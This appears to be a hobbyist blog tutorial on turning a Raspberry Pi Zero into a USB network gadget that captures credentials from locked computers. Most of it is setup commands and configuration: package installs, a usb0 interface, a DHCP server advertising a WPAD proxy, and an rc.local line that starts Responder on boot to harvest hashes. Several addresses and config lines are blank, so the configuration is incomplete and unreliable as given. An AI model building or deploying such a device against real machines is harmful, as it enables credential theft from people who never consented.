Snagging creds from locked machines with RaspberryPi Zero

I get really excited anytime I get to use my RaspberryPi Zero. When I saw Rob Fuller's Tweet this morning (@mubix) i got really excited. Coincidentally I have a thing for single board computers and been playing with the USB Gadget mode for the Pi Zero last couple of weeks. As soon as I saw the tweet i knew i have to do this with the Pi Zero.


  1. RaspberryPi Zero
  2. 4GB or larger Micro SD Card
  3. OTG USB Cable
  4. USB Ethernet adapter or WiFi Dongle (initial setup)

I am going to assume that the reader knows how to flash an image onto the SD Card. I went with the Raspbian-lite version its better with RAM utilization on the Pi. Boot up the Raspberry Pi Zero and install the software required:

sudo apt-get install -y python git python-pip python-dev screen sqlite3 isc-dhcp-server
sudo pip install pycrypto
sudo su
cd ~/
git clone

Edit /etc/network/interfaces

Open /etc/network/interfaces with your favorite text editor and add the following to it:

auto usb0
allow-hotplug usb0
iface usb0 inet static

Configure DHCPD Settings: /etc/dhcp/dhcpd.conf

Edit /etc/dhcp/dhcpd.conf and replace the contents with the text below:

ddns-update-style none;
option domain-name "domain.local";
option domain-name-servers;
default-lease-time 60;
max-lease-time 72;
# If this DHCP server is the official DHCP server for the local
# network, the authoritative directive should be uncommented.
# Use this to send dhcp log messages to a different log file (you also
# have to hack syslog.conf to complete the redirection).
log-facility local7;
# wpad
option local-proxy-config code 252 = text;
# A slightly different configuration for an internal subnet.
subnet netmask {
option routers;
option local-proxy-config "";

Edit /etc/rc.local

Edit /etc/rc.local and add the following before exit 0:

# Clear leases
rm -f /var/lib/dhcp/dhcpd.leases
touch /var/lib/dhcp/dhcpd.leases
# Start DHCP server
# Start Responder
/usr/bin/screen -dmS responder bash -c 'cd /root/responder/; python -I usb0 -f -w -r -d -F'

Create the configuration file for screen

sudo su; nano ~/.screenrc and add this:

# Logging
deflog on
logfile /root/logs/screenlog_$USER_.%H.%n.%Y%m%d-%0c:%s.%t.log

Once the above steps are completed shutdown the Pi Zero (shutdown -h now) and remove the Micro SD Card. Connect the Micro SD card to your computer. We need to modify config.txt and cmdline.txt to turn the OTG port to a virtual Ethernet port. Please ensure that you are running a version of Raspbian released after May 2016

Edit config.txt

Add this after the last line:


Edit cmdline.txt

After rootwait (the last word on the first line) add a space and then 



Safely eject the Micro SD Card. Put it back in the Pi Zero. The device is ready use the USB OTG cable to connect it to the PC and Happy Hacking !